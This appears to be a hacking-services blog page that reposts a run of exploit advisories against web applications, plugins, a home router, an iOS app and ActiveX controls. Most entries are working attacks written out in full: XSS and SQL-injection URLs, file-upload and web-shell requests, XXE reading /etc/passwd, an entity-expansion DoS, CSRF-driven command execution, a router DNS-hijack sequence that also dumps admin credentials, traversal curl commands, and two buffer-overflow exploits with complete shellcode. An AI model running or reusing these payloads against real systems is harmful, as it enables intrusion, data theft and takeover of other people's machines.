Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863542459

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/54115/info

Coppermine Photo Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?cat=14 [SQLi]
HireHackking 
source: https://www.securityfocus.com/bid/54111/info

Commentics is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Commentics 2.0 is vulnerable; prior versions may also be affected. 

http://www.example.com/commentics/commentics/comments/[admin_path]/index.php?p age=edit_page&id="><script>alert(1)</script><!--
HireHackking 
source: https://www.securityfocus.com/bid/54098/info

The FileDownload Plugin for e107 is prone to an arbitrary file-upload vulnerability and a remote file-disclosure vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks.

FileDownload 1.1 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('filename'=>'lo.php',
          'accesses'=>'<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00
HireHackking 
source: https://www.securityfocus.com/bid/54109/info

web@all is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. 

http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/54097/info

AdaptCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

AdaptCMS 2.0.2 is vulnerable. 

http://www.example.com/adapt/index.php?view=search&q=%3Cmarquee%3E%3Cfont%20color=Blue%20size=15%3Eindoushka%3C/font%3E%3C/marquee%3E
HireHackking 
source: https://www.securityfocus.com/bid/54096/info

The Image Gallery Plugin for e107 is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Image Gallery 0.9.7.1 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album
HireHackking 
source: https://www.securityfocus.com/bid/53572/info

phpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. 

GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1
HireHackking 
source: https://www.securityfocus.com/bid/53616/info
 
Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
 
An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.
 
Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 


http://www.example.com/admin/file_manager/browse.asp?field=&form=&path=../../
HireHackking 
source: https://www.securityfocus.com/bid/53616/info

Acuity CMS is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process.

Acuity CMS 2.6.2 is vulnerable; prior versions may also be affected. 

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="status"

confirmed
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="action"

fileUpload
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="file1"; filename="0wned.asp"
Content-Type: application/octet-stream

<% response.write("0wned!") %>

-----------------------------6dc3a236402e2--
HireHackking 
source: https://www.securityfocus.com/bid/53603/info

The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions or to disclose local sensitive files in the context of an affected application.

FishEye and Crucible versions up to and including 2.7.11 are vulnerable. 

Burp Repeater
Host: somehost.com
Port 443


POST /crowd/services/test HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 2420

<!DOCTYPE foo [<!ENTITY xxec6079 SYSTEM "file:///etc/passwd"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com" xmlns:soap="http://soap.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:addAllPrincipals>
         <urn:in0>
            <!--Optional:-->
            <aut:name>?</aut:name>
            <!--Optional:-->
            <aut:token>?</aut:token>
         </urn:in0>
         <urn:in1>
            <!--Zero or more repetitions:-->
            <soap:
SOAPPrincipalWithCredential>
               <!--Optional:-->
               <soap:passwordCredential>
                  <!--Optional:-->
                  <aut:credential>?</aut:credential>
                  <!--Optional:-->
                  <aut:encryptedCredential>?&xxec6079;</aut:encryptedCredential>
               </soap:passwordCredential>
               <!--Optional:-->
               <soap:principal>
                  <!--Optional:-->
                  <soap:ID>?</soap:ID>
                  <!--Optional:-->
                  <soap:active>?</soap:active>
                  <!--Optional:-->
                  <soap:attributes>
                     <!--Zero or more repetitions:-->
                     <soap:SOAPAttribute>
                        <!--Optional:-->
                        <soap:name>?</soap:name>
                        <!--Optional:-->
                        <soap:values>
                           <!--Zero or more repetitions:-->
                           <urn:string>?</urn:string>
                        </soap:values>
                     </soap:SOAPAttribute>
                  </soap:attributes>
                  <!--Optional:-->
                  <soap:conception>?</soap:conception>
                  <!--Optional:-->
                  <soap:description>?</soap:description>
                  <!--Optional:-->
                  <soap:directoryId>?</soap:directoryId>
                  <!--Optional:-->
                  <soap:lastModified>?</soap:lastModified>
                  <!--Optional:-->
                  <soap:name>?</soap:name>
               </soap:principal>
            </soap:SOAPPrincipalWithCredential>
         </urn:in1>
      </urn:addAllPrincipals>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53602/info

OpenKM is prone to a cross-site request-forgery vulnerability.

Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected application.

OpenKM 5.1.7 is vulnerable; other versions may also be affected. 

Login as administrator (having the AdminRole) and call the URL in a
different
browser window
http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%5D+cmd+%3
D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3E+%2Ftmp%
2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B
 
Alternatively the administrator could browse a prepared HTML page in a
new tab
<html>
<body>
<script>
img = new Image();
img.src="http://www.example.com/OpenKM/admin/scripting.jsp?script=String%5B%
5D+cmd+%3D+%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+%22%2Fbin%2Fecho+pwned+%3
E+%2Ftmp%2Fpoc%22%7D%3B%0D%0ARuntime.getRuntime%28%29.exec%28cmd%29%3B"
</script>
</body>
</html>
 
The above exploit does nothing else than just creating a file in /tmp
 
String[] cmd = {"/bin/sh", "-c", "/bin/echo pwned > /tmp/poc"};
Runtime.getRuntime().exec(cmd);
 
Some might also want to browse directories
http://www.example.com/OpenKM/admin/scripting.jsp?script=import+java.io.*%3B
%0D%0A%0D%0Atry+%7B%0D%0A++++String+ls_str%3B%0D%0A++++Process+ls_proc+%
3D+Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fls+-lah%22%29%3B%0D%0A+++
+DataInputStream+ls_in+%3D+new+DataInputStream%28ls_proc.getInputStream%
28%29%29%3B%0D%0A%0D%0A++++while+%28%28ls_str+%3D+ls_in.readLine%28%29%2
9+%21%3D+null%29+++++++++++%0D%0A++++++++print%28ls_str+%2B+%22%3Cbr%3E%
22%29%3B%0D%0A%0D%0A%7D+catch+%28IOException+e%29+%7B%0D%0A%7D
HireHackking 
source: https://www.securityfocus.com/bid/53595/info

JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data.

Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application.

The following versions are affected:

Versions prior to JIRA 5.0.1 are vulnerable.
Versions prior to Gliffy 3.7.1 are vulnerable.
Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. 

POST somehost.com HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: somehost.com
Content-Length: 1577

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:SecurityServer" xmlns:aut="http://authentication.integration.crowd.atlassian.com">
   <soapenv:Header/>
   <soapenv:Body>
      <urn:authenticateApplication>
         <urn:in0>
            <aut:credential>
               <aut:credential>stuff1</aut:credential>
               <aut:encryptedCredential>?&lol9;</aut:encryptedCredential>
            </aut:credential>
            <aut:name>stuff3</aut:name>
            <aut:validationFactors>
               <aut:ValidationFactor>
                  <aut:name>stuff4</aut:name>
                  <aut:value>stuff5</aut:value>
               </aut:ValidationFactor>
            </aut:validationFactors>
         </urn:in0>
      </urn:authenticateApplication>
   </soapenv:Body>
</soapenv:Envelope>
HireHackking 
source: https://www.securityfocus.com/bid/53598/info

PHP Address Book is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

PHP Address Book 7.0 is vulnerable; other versions may also be affected. 

http://www.example.com/addressbookv7.0.0/group.php/[XSS]

http://www.example.com/addressbookv7.0.0/translate.php?lang=en&target_language=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/53586/info

Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected. 

POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post			"onmouseover=prompt(1) joxy
adresse_destinataire			
adresse_expediteur			lab%40zeroscience.mk
asciiart_post				"onmouseover=prompt(2) joxy
expediteur				"onmouseover=prompt(3) joxy
message					Hello%20World
message1				%ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send					Send
titre_sav				"onmouseover=prompt(4) joxy
url_sav					http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561	"onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920	2
HireHackking 
source: https://www.securityfocus.com/bid/53585/info

The Unijimpe Captcha is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/captchademo.php/%22%3E%3Cscript%3Ealert%28%27pwned%27%29%3C/script%3E
HireHackking 
  Broadlight Residential Gateway DI3124 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  ShodanHQ Dork:
  Server: thttpd/2.25b 29dec2003 Content-Length: 348414


[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getdns.cgi?"
{"success":true,"totalCount":2,"rows":[{"domain":"googleDNS1","serverip":"8.8.8.8","type":"manual"},
{"domain":"googleDNS2","serverip":"8.8.4.4","type":"manual"}]}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/savedns.cgi?domainname=evilDNS&domainserverip=133.71.33.7"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.8.8"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/deldns.cgi?serverip=8.8.4.4"
{success:true,errormsg:"Operation Succeeded"}

[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/getconf.cgi" | egrep '(username|password)'
<username>admin</username>
<password>admin</password>
HireHackking 
# Exploit Title: WiFi HD 8.1 - Directory Traversal and Denial of Service
# Date: 2015-05-27
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Vendor Homepage: http://www.savysoda.com
# Software Link: http://www.savysoda.com/WiFiHD/
# Version: 8.1 (Apr 1, 2015)
# Tested on: iPhone

Disclosure Timeline:
* 2015-05-30: Vendor notified via email.
* 2015-06-05: No reponse from the vendor. Advisory released.


Software description:
=====================
WiFi HD is an iOS app which allows users to share files between their iPhone and PC by running a web server, FTP server, or SMB server on the iPhone or through various cloud services. 


Vulnerabilities:
================
The web server (titled "WiFi" in the app) is vulnerable to multiple directory traversal issues which allow an attacker to download, upload, create, or delete any file to which the app has access. The SMB server (titled "Shared Folder") is vulnerable to a Denial of Service attack when issued the command, "dir -c", within smbclient. It also discloses a listing of all readable files within the iPhone's file system via the IPC$ share.


Web Server Proof-of-Concept
===========================
Read arbitrary files/folders:
    Read /etc/passwd:
        curl "http://[TARGET IP]/../../../../../../../../etc/passwd"
    List contents of the /tmp directory:
        curl "http://[TARGET IP]/../../../../../../../../tmp/"

Create Folders:
    Create the folder, "/tmp/PoC-Folder":
        curl -d 'foldername=/../../../../../../../../tmp/PoC-Folder&button=Create+Folder' "http://[TARGET IP]/"
    
Delete Files/Folders:
    Delete the folder, "/tmp/PoC-Folder":
        curl 'http://[TARGET IP]/!DEL!/../../../../../../../../tmp/PoC-Folder'
                                  
Upload a File:
    Upload /etc/services to /tmp/example.txt:
        curl -F 'file=@/etc/services;filename=/../../../../../../../../tmp/example.txt' -F 'button=Submit' 'http://[TARGET IP]/'

    
SMB Server Proof-of-Concept
===========================
Denial of Service:
    smbclient -N -c 'dir \' //[TARGET IP]/IPC$
    
Browse the iPhone's Filesystem:
    smbclient -N //[TARGET IP]/IPC$
HireHackking 
<html>
<br>1 Click Extract Audio Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickExtractAudio.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1SYwV3u -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\xff\xff";
seh = "\x58\xE4\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
<html>
<br>1 Click Audio Converter Activex Buffer Overflow</br>
<br>Affected version=2.3.6</br>
<br>Vendor Homepage:http://www.dvdvideotool.com/index.htm</br>
<br>Software Link:www.dvdvideotool.com/1ClickAudioConverter.exe</br>
<br>The vulnerability lies in the COM component used by the product SkinCrafter.dll </br>
<br>SkinCrafter.dll version.1.9.2.0</br>
<br>Vulnerability tested on Windows Xp Sp3 (EN),with IE6</br>
<br>Author: metacom</br>
<!--Video Poc: http://bit.ly/1GmOAyq -->
<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' ></object>
<script >
junk1 = "";
while(junk1.length < 2048) junk1+="A";
nseh = "\xeb\x06\x90\x90";
seh = "\xD7\x51\x04\x10";
nops= "";
while(nops.length < 50) nops+="\x90";
shellcode =(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"+
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"+
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"+
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"+
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"+
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"+
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"+
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"+
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"+
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"+
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"+
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"+
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"+
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"+
"\x4e\x46\x43\x36\x42\x50\x5a");
junk2 = "";
while(junk2.length < 2048) junk2+="B";
payload = junk1 + nseh + seh + nops+ shellcode + junk2;
arg1=payload;
arg1=arg1;
arg2="defaultV";
arg3="defaultV";
arg4="defaultV";
arg5="defaultV";
target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
</script>
</html>
HireHackking 
# Exploit Title: Wordpress Really Simple Guest Post File Include
# Google Dork: inurl:"really-simple-guest-post" intitle:"index of"
# Date: 04/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/really-simple-guest-post/
# Version: <=1.0.6
# Tested on: Linux

The vulnerable file is called:
simple-guest-post-submit.php and its full path is
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
The vulnerable code is as follows:
(line 8)
require_once($_POST["rootpath"]);
As you can see, the require_once function includes a data based on
user-input without any prior verification.
So, an attacker can exploit this flaw and come directly into the url
/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
and send a post data like: "rootpath=the_file_to_include"

Proof of concept:
curl -X POST -F "rootpath=/etc/passwd" --url
http://localhost/wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php
which will print out the content of /etc/passwd file.

Greats to Black Sniper & Moh Ooasiic
by Kuroi'SH
HireHackking 
source: https://www.securityfocus.com/bid/53575/info

backupDB() is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

backupDB() 1.2.7a is vulnerable; other versions may also be affected.

http://www.example.com/backupDB/backupDB.php?onlyDB="><script>alert(document.cookie);</script>
HireHackking 
source: https://www.securityfocus.com/bid/53572/info
 
phpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 
phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. 

GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir="><script>alert(document.cookie);</script> HTTP/1.1
HireHackking 
=begin
# Exploit Title: JDownloader 2 Beta Directory Traversal Vulnerability (Zip Extraction)
# Date: 2015-06-02
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://jdownloader.org/home/index
# Software Link: http://jdownloader.org/download/offline
# Version: 1171 <= SVN Revision <= 2331
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Windows XP SP3 / Windows 7 SP1
# CVE: 
# Category: remote

1. Product Description
Extract from the official website :
"JDownloader is a free, open-source download management tool with a huge community of developers that makes downloading as easy and fast as it should be. Users can start, stop or pause downloads, set bandwith limitations, auto-extract archives and much more. It's an easy-to-extend framework that can save hours of your valuable time every day!"

2. Vulnerability Description & Technical Details
JDownloader 2 Beta is vulnerable to a directory traversal security issue.

Class : org.appwork.utils.os.CrossSystem
Method : public static String alleviatePathParts(String pathPart)

This method is called with a user-provided path part as parameter,
and should return a valid and safe path where to create a file/folder.

This method first checks that the input filepath does not limit
itself to a (potentially dangerous) sequence of dots and otherwise 
removes it :
pathPart = pathPart.replaceFirst("\\.+$", "");

However right after this, the value returned is cleaned from
starting and ending white space characters :
return pathPart.trim();

Therefore, if you pass to this method a list of dots followed by some white space
like "..  ", it will bypass the first check and then return the valid path ".."
which is insecure.

This leads to a vulnerability when JDownloader 2 Beta just downloaded a ZIP file and
then tries to extract it. A ZIP file with an entry containing ".. " sequence(s) 
would cause JD2b to overwrite/create arbitrary files on the target filesystem.

3. Impact Analysis :
To exploit this issue, the victim is required to launch a standard ZIP file download.
The Unzip plugin is enabled by default in JDownloader : any ZIP file downloaded will
automatically be extracted.

By exploiting this issue, a malicious user may be able to create/overwrite arbitrary
files on the target file system.
Therefore, it is possible to take the control of the victim's machine with the rights of
the JDownloader process - typically standard (non-administrator) rights - for example by
overwriting existing executable files, by uploading an executable file in a user's
autorun directory etc.

4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Medium (AC:M)
- Authentication (Au) : None (Au:N)

* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)

* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 6.8
- Impact Subscore 6.4
- Exploitability Subscore 8.6

5. Proof of Concept
- Create a ZIP file with an entry like ".. /poc.txt"
- Upload it to an HTTP server (for example)
- Run a vulnerable revision of JDownloader 2 Beta and use it to download the file from the server
- JD2b will download and extract the file, which will create a "poc.txt" one level upper from your download directory

OR see the Metasploit Exploit provided.

6. Vulnerability Timeline
2012-04-27 : Vulnerability created (SVN Revision > 1170)
2014-08-19 : Vulnerability identified
[...]      : Sorry, I was not sure how to handle this and forgot about it for a long time
2015-05-08 : Vendor informed about this issue
2015-05-08 : Vendor response + Code modification (Revision 2332)
2015-05-11 : Code modification (SVN Revision 2333)
2015-05-11 : Notified the vendor : The vulnerable code is still exploitable via ".. .." (dot dot blank dot dot)
2015-05-12 : Code modification (SVN Revision 2335)
2015-05-12 : Confirmed to the vendor that the code looks now safe
